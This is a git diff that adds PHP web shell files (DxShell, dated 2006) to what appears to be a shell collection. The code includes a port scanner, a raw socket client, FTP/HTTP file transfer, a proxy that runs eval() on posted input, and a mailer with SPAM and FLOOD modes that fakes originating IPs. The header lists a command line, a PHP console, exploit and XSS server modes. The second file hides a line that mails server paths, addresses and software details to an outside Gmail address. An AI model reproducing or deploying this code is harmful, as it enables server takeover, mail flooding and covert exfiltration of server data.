Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))		{		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{	if (!isset($_GET['dxparam']))
+		{
+		print '';		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/138shell/D/DxShell_hk.php.txt b/138shell/D/DxShell_hk.php.txt
new file mode 100644
index 0000000..db01596
--- /dev/null
+++ b/138shell/D/DxShell_hk.php.txt
@@ -0,0 +1,2029 @@
+<?php
+/*
+  DDDDD        SSSSS    DxShell    by î_Î Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ# 1227-700
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
